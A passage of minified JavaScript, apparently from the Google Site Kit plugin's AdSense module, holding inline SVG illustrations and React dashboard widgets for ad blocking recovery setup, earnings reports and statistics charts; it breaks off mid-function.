<filter id="filter0_d_1505_4259" x="60.3062" y="21.2396" width="214.416" height="153.828" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="2.92883"/>
<feGaussianBlur stdDeviation="5.85766"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1505_4259"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1505_4259" result="shape"/>
</filter>
<filter id="filter1_d_1505_4259" x="210.409" y="7.32777" width="61.3965" height="61.3967" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="2.92883"/>
<feGaussianBlur stdDeviation="5.85766"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1505_4259"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1505_4259" result="shape"/>
</filter>
<filter id="filter2_d_1505_4259" x="176.058" y="111.531" width="49.5554" height="49.5559" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="2.36398"/>
<feGaussianBlur stdDeviation="4.72796"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1505_4259"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1505_4259" result="shape"/>
</filter>
<filter id="filter3_d_1505_4259" x="151.644" y="90.8412" width="35.5222" height="35.5227" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="1.69455"/>
<feGaussianBlur stdDeviation="3.38909"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1505_4259"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1505_4259" result="shape"/>
</filter>
<filter id="filter4_d_1505_4259" x="267.526" y="55.7557" width="35.5222" height="35.5227" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="1.69455"/>
<feGaussianBlur stdDeviation="3.38909"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1505_4259"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1505_4259" result="shape"/>
</filter>
<clipPath id="clip0_1505_4259">
<rect width="385" height="145" fill="white"/>
</clipPath>
</defs>
</svg>
",mobile:"data:image/svg+xml;base64,<svg width="427" height="297" viewBox="0 0 427 297" fill="none" xmlns="http://www.w3.org/2000/svg">
<g clip-path="url(#clip0_1496_3878)">
<path d="M490.068 -139.048C412.455 -202.587 324.78 -178.182 286.173 -153.111C235.806 -120.403 242.745 -78.9838 216.253 -57.2109C189.76 -35.438 174.211 -34.8548 128.712 -26.0118C83.2133 -17.1687 13.5842 17.2777 5.16446 93.7739C-3.25524 170.27 45.2302 229.343 116.487 241.027C187.744 252.711 210.101 205.103 267.728 183.307C325.354 161.511 351.692 185.31 406.833 169.038C529.898 132.723 608.496 -42.0946 490.068 -139.048Z" fill="#B8E6CA"/>
<g filter="url(#filter0_d_1496_3878)">
<rect x="92.6025" y="73.4963" width="260.835" height="178.087" rx="14.2464" fill="white"/>
<rect x="106.744" y="109.474" width="79.15" height="127.719" rx="5.34241" fill="#BED4FF"/>
<circle cx="128.33" cy="131.061" r="10.7932" fill="#7F9CD4"/>
<path d="M129.498 151.191L113.939 167.83H178.699L155.15 142.646L138.329 160.635L129.498 151.191Z" fill="#7F9CD4"/>
<rect x="131.929" y="215.607" width="28.7818" height="14.3909" rx="7.19545" fill="#7F9CD4"/>
<path fill-rule="evenodd" clip-rule="evenodd" d="M169.603 195.996C169.603 197.377 168.483 198.496 167.103 198.496H125.103C123.722 198.496 122.603 197.377 122.603 195.996C122.603 194.616 123.722 193.496 125.103 193.496H167.103C168.483 193.496 169.603 194.616 169.603 195.996Z" fill="#7F9CD4"/>
<path fill-rule="evenodd" clip-rule="evenodd" d="M169.603 204.996C169.603 206.377 168.483 207.496 167.103 207.496H125.103C123.722 207.496 122.603 206.377 122.603 204.996C122.603 203.616 123.722 202.496 125.103 202.496H167.103C168.483 202.496 169.603 203.616 169.603 204.996Z" fill="#7F9CD4"/>
<path d="M92.6025 87.7427C92.6025 79.8747 98.9809 73.4963 106.849 73.4963H339.191C347.059 73.4963 353.438 79.8747 353.438 87.7428V95.0827H92.6025V87.7427Z" fill="#EBEEF0"/>
<rect x="103.396" y="80.6917" width="7.19545" height="7.19545" rx="3.59773" fill="#CBD0D3"/>
<rect x="114.189" y="80.6917" width="7.19545" height="7.19545" rx="3.59773" fill="#CBD0D3"/>
<rect x="207.308" y="109.474" width="126.82" height="43.1727" rx="10" fill="#EBEEF0"/>
<rect x="207.603" y="164.496" width="93" height="11" rx="5.5" fill="#EBEEF0"/>
<rect x="207.308" y="186.211" width="109.731" height="5.64878" rx="2.82439" fill="#EBEEF0"/>
<rect x="207.308" y="199.829" width="93.5409" height="5.64878" rx="2.82439" fill="#EBEEF0"/>
<rect x="207.308" y="213.447" width="126.82" height="5.64878" rx="2.82439" fill="#EBEEF0"/>
</g>
<g filter="url(#filter1_d_1496_3878)">
<circle cx="323.528" cy="80.4221" r="25.9258" fill="#C59539"/>
<path d="M328.742 73.4622C328.065 72.7093 326.032 71.2035 323.321 71.2035C319.933 71.2035 317.9 73.4622 317.9 75.7209C317.9 81.9333 328.742 78.396 328.742 84.7557C328.742 87.0144 326.709 89.2731 323.321 89.2731C320.611 89.2731 318.578 87.7673 317.9 87.0144" stroke="#FFE4B1" stroke-width="2" stroke-linecap="round"/>
<path d="M323.321 66.6863V93.7906" stroke="#FFE4B1" stroke-width="2" stroke-linecap="round"/>
</g>
<g filter="url(#filter2_d_1496_3878)">
<circle cx="268.528" cy="215.422" r="20.9258" fill="#C59539"/>
<path d="M272.737 209.804C272.19 209.197 270.549 207.981 268.362 207.981C265.627 207.981 263.986 209.804 263.986 211.627C263.986 216.642 272.737 213.787 272.737 218.92C272.737 220.743 271.096 222.566 268.362 222.566C266.174 222.566 264.533 221.351 263.986 220.743" stroke="#FFE4B1" stroke-width="2" stroke-linecap="round"/>
<path d="M268.361 204.335V226.212" stroke="#FFE4B1" stroke-width="2" stroke-linecap="round"/>
</g>
<g filter="url(#filter3_d_1496_3878)">
<circle cx="225.603" cy="178.496" r="15" fill="#C59539"/>
<path d="M228.619 174.469C228.227 174.034 227.051 173.162 225.483 173.162C223.523 173.162 222.347 174.469 222.347 175.776C222.347 179.37 228.619 177.324 228.619 181.003C228.619 182.31 227.443 183.617 225.483 183.617C223.915 183.617 222.739 182.746 222.347 182.31" stroke="#FFE4B1" stroke-width="1.71429" stroke-linecap="round"/>
<path d="M225.483 170.549V186.231" stroke="#FFE4B1" stroke-width="1.71429" stroke-linecap="round"/>
</g>
<g filter="url(#filter4_d_1496_3878)">
<circle cx="372.603" cy="30.4963" r="15" fill="#C59539"/>
<path d="M375.619 26.4693C375.227 26.0337 374.051 25.1625 372.483 25.1625C370.523 25.1625 369.347 26.4693 369.347 27.7761C369.347 31.3705 375.619 29.3239 375.619 33.0034C375.619 34.3102 374.443 35.6171 372.483 35.6171C370.915 35.6171 369.739 34.7458 369.347 34.3102" stroke="#FFE4B1" stroke-width="1.71429" stroke-linecap="round"/>
<path d="M372.483 22.549V38.2308" stroke="#FFE4B1" stroke-width="1.71429" stroke-linecap="round"/>
</g>
</g>
<defs>
<filter id="filter0_d_1496_3878" x="76.6025" y="61.4963" width="292.835" height="210.087" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="4"/>
<feGaussianBlur stdDeviation="8"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1496_3878"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1496_3878" result="shape"/>
</filter>
<filter id="filter1_d_1496_3878" x="281.603" y="42.4963" width="83.8516" height="83.8516" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="4"/>
<feGaussianBlur stdDeviation="8"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1496_3878"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1496_3878" result="shape"/>
</filter>
<filter id="filter2_d_1496_3878" x="234.688" y="184.811" width="67.6801" height="67.6801" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="3.22857"/>
<feGaussianBlur stdDeviation="6.45713"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1496_3878"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1496_3878" result="shape"/>
</filter>
<filter id="filter3_d_1496_3878" x="201.345" y="156.553" width="48.5144" height="48.5144" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="2.3143"/>
<feGaussianBlur stdDeviation="4.6286"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1496_3878"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1496_3878" result="shape"/>
</filter>
<filter id="filter4_d_1496_3878" x="348.345" y="8.55344" width="48.5144" height="48.5144" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="2.3143"/>
<feGaussianBlur stdDeviation="4.6286"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1496_3878"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1496_3878" result="shape"/>
</filter>
<clipPath id="clip0_1496_3878">
<rect width="427" height="297" fill="white"/>
</clipPath>
</defs>
</svg>
",verticalPosition:"bottom"},helpText:(0,g.__)("*Average for publishers showing non-dismissible ad blocking recovery messages placed at the center of the page on desktop","google-site-kit")})]}):(0,G.jsx)(t,{})}AdBlockingRecoverySetupCTAWidget.propTypes={Widget:ee().elementType.isRequired,WidgetNull:ee().elementType.isRequired};const le=(0,ie.A)({moduleName:F.Py})(AdBlockingRecoverySetupCTAWidget);var ce=i(32600),de=i(76984),ge=i(37467);function AdBlockingRecoverySetupSuccessNotification({id:e,Notification:t}){const{triggerSurvey:i}=(0,a.useDispatch)(ae.oR),s=(0,a.useSelect)(e=>e(k.wl).getAccountID()),o=(0,a.useSelect)(e=>e(k.wl).getServiceURL({path:`/${s}/privacymessaging/ad_blocking`})),n=(0,I.useCallback)(()=>{i("abr_setup_completed",{ttl:S.tt})},[i]),[,r]=(0,ge.A)("notification"),l=(0,I.useCallback)(()=>{r(void 0)},[r]);return(0,G.jsx)(t,{onView:n,children:(0,G.jsx)(ce.A,{notificationID:e,type:de.Q.SUCCESS,title:(0,g.__)("You successfully enabled the ad blocking recovery message","google-site-kit"),description:(0,h.A)((0,g.__)("Make sure to also create the message in <a>AdSense</a>, otherwise this feature won’t work","google-site-kit"),{a:(0,G.jsx)(P.A,{href:o,external:!0,hideExternalIndicator:!0})}),dismissButton:{onClick:l}})})}AdBlockingRecoverySetupSuccessNotification.propTypes={id:ee().string.isRequired,Notification:ee().elementType.isRequired};var ue=i(42616);function AdSenseConnectCTAWidget({Widget:e,WidgetNull:t}){const{dismissItem:i}=(0,a.useDispatch)(ae.oR),s={tooltipSlug:F.CX,title:(0,g.__)("You can always connect AdSense from here later","google-site-kit"),content:(0,g.__)("The Monetization section will be added back to your dashboard if you connect AdSense in Settings later","google-site-kit"),dismissLabel:(0,g.__)("Got it","google-site-kit")},o=(0,oe.i)(s),n=(0,a.useSelect)(e=>e(Y.i).isModuleConnected(F.Py)),r=(0,a.useSelect)(e=>e(ae.oR).isItemDismissed(F.SM)),l=(0,a.useSelect)(e=>e(ae.oR).isDismissingItem(F.SM)),c=(0,I.useCallback)(async()=>{o(),await i(F.SM)},[i,o]);return!1===n&&!1===r&&!1===l?(0,G.jsx)(e,{noPadding:!0,children:(0,G.jsx)(ue.A,{onDismissModule:c})}):(0,G.jsx)(t,{})}AdSenseConnectCTAWidget.propTypes={Widget:ee().elementType.isRequired,WidgetNull:ee().elementType.isRequired};const me=AdSenseConnectCTAWidget;var pe=i(63560),Ie=i(39016),he=i(80),ye=i(22942),Ae=i(42960),Me=i(44148),Ne=i(14578),fe=i(96574),Te=i(50231),Se=i(87395);function DashboardTopEarningPagesWidgetGA4({WidgetNull:e,WidgetReportError:t,Widget:i}){const s=(0,ne.A)(),o=(0,a.useInViewSelect)(e=>e(he.K9).isGatheringData()),{startDate:n,endDate:r}=(0,a.useSelect)(e=>e(ae.oR).getDateRangeDates({offsetDays:he.f2})),l=(0,a.useSelect)(e=>e(k.wl).getAccountID()),c={startDate:n,endDate:r,dimensions:["pagePath","adSourceName"],metrics:[{name:"totalAdRevenue"}],dimensionFilters:{adSourceName:`Google AdSense account (${l})`},orderby:[{metric:{metricName:"totalAdRevenue"},desc:!0}],limit:5,reportID:"adsense_top-earning-pages-widget-ga4_widget_args"},d=(0,a.useInViewSelect)(e=>e(he.K9).getReport(c),[c]),u=(0,a.useSelect)(e=>e(he.K9).getErrorForSelector("getReport",[c])),m=(0,a.useInViewSelect)(e=>u?void 0:e(he.K9).getPageTitles(d,c),[d,c]),p=(0,a.useSelect)(e=>!e(he.K9).hasFinishedResolution("getReport",[c])||!u&&void 0===m),h=(0,a.useSelect)(e=>e(ae.oR).isItemDismissed(F.kj)),y=(0,a.useSelect)(e=>s?null:e(he.K9).getServiceReportURL("content-publisher-overview",(0,Ae.M)({startDate:n,endDate:r}))),A=(0,a.useSelect)(e=>e(he.K9).getAdSenseLinked()),M=(0,a.useSelect)(e=>e(ae.oR).isAdBlockerActive()),N=(0,I.useRef)(),[f,j]=(0,I.useState)(!1);function v(e){N.current=e,e&&!f&&j(!0)}const b=(0,T.A)(),_=(0,pe.A)(N,{threshold:.25}),[x,C]=(0,I.useState)(!1),D=!!_?.intersectionRatio;if((0,I.useEffect)(()=>{D&&!x&&(A&&(0,S.sx)(`${b}_top-earning-pages-widget`,"view_widget"),A||(0,S.sx)(`${b}_top-earning-pages-widget`,"view_notification"),C(!0))},[D,b,A,x]),h)return(0,G.jsx)(e,{});if(!A&&s)return(0,G.jsx)(e,{});if(M)return(0,G.jsx)(i,{Footer,children:(0,G.jsx)(te.A,{moduleSlug:"adsense"})});if(p||void 0===o)return(0,G.jsx)(i,{Footer,noPadding:!0,children:(0,G.jsx)(Ne.A,{rows:5,padding:!0})});if(!A&&!s)return(0,G.jsx)(i,{Footer,ref:v,children:(0,G.jsx)(H.gx,{onClick:function(){(0,S.sx)(`${b}_top-earning-pages-widget`,"click_learn_more_link")}})});if(u)return(0,G.jsx)(i,{Footer,children:(0,G.jsx)(t,{moduleSlug:"analytics-4",error:u})});function Footer(){return(0,G.jsx)(Me.A,{className:"googlesitekit-data-block__source",name:(0,g._x)("Analytics","Service name","google-site-kit"),href:y,external:!0})}const E="googlesitekit-typography googlesitekit-typography--title googlesitekit-typography--medium",w=[{columnHeaderClassName:E,title:(0,g.__)("Top Earning Pages","google-site-kit"),tooltip:(0,g.__)("Top Earning Pages","google-site-kit"),primary:!0,Component({row:e}){const[{value:t}]=e.dimensionValues,i=m[t],o=(0,a.useSelect)(e=>s?null:e(he.K9).getServiceReportURL("all-pages-and-screens",{filters:{unifiedPagePathScreen:t},dates:{startDate:n,endDate:r}}));return s?(0,G.jsx)("span",{children:i}):(0,G.jsx)(P.A,{href:o,title:i,external:!0,hideExternalIndicator:!0,children:i})}},{columnHeaderClassName:E,title:(0,g.__)("Earnings","google-site-kit"),tooltip:(0,g.__)("Earnings","google-site-kit"),field:"metricValues.0.value",Component:({fieldValue:e})=>(0,G.jsx)("span",{children:(0,S.Eo)(e,{style:"currency",currency:d?.metadata?.currencyCode})})}];return(0,G.jsx)(i,{Footer,ref:v,noPadding:!0,children:(0,G.jsx)(Te.A,{children:(0,G.jsx)(fe.A,{rows:d?.rows||[],columns:w,zeroState:Se.QQ,gatheringData:o})})})}DashboardTopEarningPagesWidgetGA4.propTypes={Widget:ee().elementType.isRequired,WidgetNull:ee().elementType.isRequired,WidgetReportError:ee().elementType.isRequired};const ke=(0,Ie.A)((0,ie.A)({moduleName:F.Py}),(0,ie.A)({moduleName:ye.L1}))(DashboardTopEarningPagesWidgetGA4);var je=i(4751),ve=i(54286);const be=function Header(){const e=(0,a.useSelect)(e=>e(ae.oR).getDateRangeNumberOfDays());return(0,G.jsx)(ve.A,{title:(0,g.sprintf)(/* translators: %s: number of days */ /* translators: %s: number of days */ (0,g._n)("Performance over the last %s day","Performance over the last %s days",e,"google-site-kit"),e)})};var _e=i(32091),xe=i.n(_e);const Ce=function Footer(){const e=(0,ne.A)(),t=(0,a.useSelect)(e=>e(ae.oR).getDateRangeDates({offsetDays:k.f2})),i=(0,a.useSelect)(i=>e?null:i(k.wl).getServiceReportURL(function(e){xe()(e,"A dates object is required.");const{startDate:t,endDate:i}=e;return xe()((0,S.Qr)(t),"A valid startDate is required."),xe()((0,S.Qr)(i),"A valid endDate is required."),{d:`${t.replace(/-/g,"/")}-${i.replace(/-/g,"/")}`}}(t)));return(0,G.jsx)(Me.A,{href:i,name:(0,g._x)("AdSense","Service name","google-site-kit"),external:!0})};var De=i(10740),Ee=i(63505),we=i(94406);function Overview({metrics:e,currentRangeData:t,previousRangeData:i,selectedStats:a,handleStatsSelection:s}){const{totals:o,headers:n}=t,{totals:r}=i,l={smSize:2,mdSize:2,lgSize:3};return(0,G.jsx)(De.xA,{children:(0,G.jsxs)(we.A,{className:"mdc-layout-grid__inner",children:[(0,G.jsx)(De.fh,{...l,children:(0,G.jsx)(Ee.A,{stat:0,className:"googlesitekit-data-block--page-rpm googlesitekit-data-block--button-1",title:e[n[0].name],datapoint:o?.cells[0].value||0,datapointUnit:n[0]?.currencyCode,change:(0,S.Zf)(r?.cells[0].value||0,o?.cells[0].value||0),changeDataUnit:"%",context:"button",selected:0===a,handleStatSelection:s})}),(0,G.jsx)(De.fh,{...l,children:(0,G.jsx)(Ee.A,{stat:1,className:"googlesitekit-data-block--page-rpm googlesitekit-data-block--button-2",title:e[n[1].name],datapoint:o?.cells[1].value||0,datapointUnit:n[1]?.currencyCode,change:(0,S.Zf)(r?.cells[1].value||0,o?.cells[1].value||0),changeDataUnit:"%",context:"button",selected:1===a,handleStatSelection:s})}),(0,G.jsx)(De.fh,{...l,children:(0,G.jsx)(Ee.A,{stat:2,className:"googlesitekit-data-block--page-rpm googlesitekit-data-block--button-3",title:e[n[2].name],datapoint:o?.cells[2].value||0,change:(0,S.Zf)(r?.cells[2].value||0,o?.cells[2].value||0),changeDataUnit:"%",context:"button",selected:2===a,handleStatSelection:s})}),(0,G.jsx)(De.fh,{...l,children:(0,G.jsx)(Ee.A,{stat:3,className:"googlesitekit-data-block--impression googlesitekit-data-block--button-4",title:e[n[3].name],datapoint:o?.cells[3].value||0,datapointUnit:"%",change:(0,S.Zf)(r?.cells[3].value||0,o?.cells[3].value||0),changeDataUnit:"%",context:"button",selected:3===a,handleStatSelection:s})})]})})}Overview.propTypes={metrics:ee().object,currentRangeData:ee().object,previousRangeData:ee().object,selectedStats:ee().number.isRequired,handleStatsSelection:ee().func.isRequired};const Ze=Overview;var Re=i(28975),Le=i(44161);function Stats(e){const{metrics:t,currentRangeData:i,previousRangeData:a,selectedStats:s}=e,o=function(e,t,i,a,s){const o=[[{type:"date",label:(0,g.__)("Day","google-site-kit")},{type:"string",role:"tooltip",p:{html:!0}},{type:"number",label:i},{type:"number",label:(0,g.__)("Previous period","google-site-kit")}]];function n(e){const t=new Date(e);return t.setDate(e.getDate()+1),t}function r(e){return t=>e.getTime()===(0,S.XH)(t.cells[0].value).getTime()}let l=C(e.startDate),c=C(t.startDate);const d=C(e.endDate),u=(0,S.JK)(),m={weekday:"short",month:"short",day:"numeric"};for(;l<=d;){const d=parseFloat((e?.rows||[]).find(r(l))?.cells?.[a]?.value||0),p=parseFloat((t?.rows||[]).find(r(c))?.cells?.[a]?.value||0),I=(0,S.Cn)(d,p),h=(0,S.vY)(I),y=(0,g.sprintf)(/* translators: 1: date for user stats, 2: previous date for user stats comparison */ /* translators: 1: date for user stats, 2: previous date for user stats comparison */ (0,g._x)("%1$s vs %2$s","Date range for chart tooltip","google-site-kit"),l.toLocaleDateString(u,m),c.toLocaleDateString(u,m));let A=(0,S.Eo)(d,s?.currencyCode);"METRIC_RATIO"===s?.type&&(A=(0,S.Eo)(d,"%"));const M=(0,g.sprintf)(/* translators: 1: selected stat label, 2: numeric value of selected stat, 3: up or down arrow , 4: different change in percentage, %%: percent symbol */ /* translators: 1: selected stat label, 2: numeric value of selected stat, 3: up or down arrow , 4: different change in percentage, %%: percent symbol */ (0,g._x)("%1$s: <strong>%2$s</strong> <em>%3$s %4$s%%</em>","Stat information for chart tooltip","google-site-kit"),i,A,h,Math.abs(I).toFixed(2).replace(/(.00|0)$/,""));o.push([l,`<div class="${x()("googlesitekit-visualization-tooltip",{"googlesitekit-visualization-tooltip--up":I>0,"googlesitekit-visualization-tooltip--down":I<0})}">\n\t\t\t\t<p>${y}</p>\n\t\t\t\t<p>${M}</p>\n\t\t\t</div>`,d,p]),l=n(l),c=n(c)}return o}(i,a,Object.values(t)[s],s+1,i.headers[s+1]),n=["#6380b8","#4bbbbb","#3c7251","#8e68cb"];const[,...r]=o.slice(1).map(([e])=>e),l={curveType:"function",height:270,width:"100%",chartArea:{height:"80%",width:"100%",left:60},legend:{position:"top",textStyle:{color:"#616161",fontSize:12}},hAxis:{format:"MMM d",gridlines:{color:"#fff"},textStyle:{color:"#616161",fontSize:12},ticks:r},vAxis:{format:function({type:e,currencyCode:t}={}){return"METRIC_CURRENCY"===e?(0,Re.Od)(t):{METRIC_TALLY:void 0,METRIC_RATIO:"percent",METRIC_DECIMAL:"decimal",METRIC_MILLISECONDS:void 0}[e]}(i.headers[s+1]),gridlines:{color:"#eee"},minorGridlines:{color:"#eee"},textStyle:{color:"#616161",fontSize:12},titleTextStyle:{color:"#616161",fontSize:12,italic:!1},viewWindow:{min:0}},focusTarget:"category",crosshair:{color:"gray",opacity:.1,orientation:"vertical",trigger:"both"},tooltip:{isHtml:!0,trigger:"both"},series:{0:{color:n[s],targetAxisIndex:0},1:{color:n[s],targetAxisIndex:0,lineDashStyle:[3,3],lineWidth:1}}};return v(i,s+1)&&v(a,s+1)?l.vAxis.viewWindow.max=100:l.vAxis.viewWindow.max=void 0,(0,G.jsx)(De.xA,{className:"googlesitekit-adsense-site-stats",children:(0,G.jsx)(De.fI,{children:(0,G.jsx)(De.fh,{size:12,children:(0,G.jsx)(Le.A,{chartType:"LineChart",data:o,loadingHeight:"270px",loadingWidth:"100%",options:l})})})})}Stats.propTypes={metrics:ee().object,currentRangeData:ee().object,previousRangeData:ee().object,selectedStats:ee().number.isRequired};var Ge=i(84984);function StatusMigration(){const e=(0,a.useSelect)(e=>e(k.wl).getAccountID()),t=(0,a.useSelect)(t=>t(k.wl).getAFCClient(e)),i=(0,a.useSelect)(t=>t(k.wl).getCurrentSite(e)),s=(0,a.useSelect)(e=>e(k.wl).getAdminReauthURL()),o=(0,a.useSelect)(e=>e(M.M).isNavigating()),{setAccountStatus:n,setSiteStatus:r,setAccountSetupComplete:l,setSiteSetupComplete:c,saveSettings:d}=(0,a.useDispatch)(k.wl),{navigateTo:u}=(0,a.useDispatch)(M.M);let m;return t&&i&&(m=!(t.state!==k.jb||i.state!==k.jb||!i.autoAdsEnabled)),(0,I.useEffect)(()=>{m&&(async()=>{await n(D.pJ),await r(D.TF),await d()})()},[m,d,n,r]),!0===m?null:(0,G.jsx)(Ge.xA,{children:(0,G.jsx)(Ge.fI,{children:(0,G.jsxs)(Ge.fh,{size:12,children:[void 0===m&&(0,G.jsx)(O.ProgressBar,{}),!1===m&&(0,G.jsx)(L.A,{type:L.A.TYPES.WARNING,description:(0,g.__)("You need to redo setup to complete AdSense configuration","google-site-kit"),ctaButton:{label:(0,g.__)("Redo setup","google-site-kit"),onClick:async function(){await l(!1),await c(!1),await d(),u(s)},disabled:o,inProgress:o}})]})})})}function ModuleOverviewWidget({Widget:e,WidgetReportError:t}){const i=(0,ne.A)(),[s,o]=(0,I.useState)(0),n=(0,a.useSelect)(e=>i?null:e(k.wl).getAccountStatus()),r=(0,a.useSelect)(e=>i?null:e(k.wl).getSiteStatus()),l=D.RL.includes(n)||r===D.Uv,{startDate:c,endDate:d,compareStartDate:g,compareEndDate:u}=(0,a.useSelect)(e=>e(ae.oR).getDateRangeDates({compare:!0,offsetDays:k.f2})),m={metrics:Object.keys(ModuleOverviewWidget.metrics),startDate:c,endDate:d,reportID:"adsense_module-overview-widget_widget_currentRangeArgs"},p={metrics:Object.keys(ModuleOverviewWidget.metrics),startDate:g,endDate:u,reportID:"adsense_module-overview-widget_widget_previousRangeArgs"},h={...m,dimensions:["DATE"],reportID:"adsense_module-overview-widget_widget_currentRangeChartArgs"},y={...p,dimensions:["DATE"],reportID:"adsense_module-overview-widget_widget_previousRangeChartArgs"},A=(0,a.useInViewSelect)(e=>e(k.wl).getReport(m),[m]),M=(0,a.useInViewSelect)(e=>e(k.wl).getReport(p),[p]),N=(0,a.useInViewSelect)(e=>e(k.wl).getReport(h),[h]),f=(0,a.useInViewSelect)(e=>e(k.wl).getReport(y),[y]),T=(0,a.useSelect)(e=>!(e(k.wl).hasFinishedResolution("getReport",[m])&&e(k.wl).hasFinishedResolution("getReport",[p])&&e(k.wl).hasFinishedResolution("getReport",[h])&&e(k.wl).hasFinishedResolution("getReport",[y]))),S=(0,a.useSelect)(e=>[e(k.wl).getErrorForSelector("getReport",[m]),e(k.wl).getErrorForSelector("getReport",[p]),e(k.wl).getErrorForSelector("getReport",[h]),e(k.wl).getErrorForSelector("getReport",[y])]).filter(Boolean);return 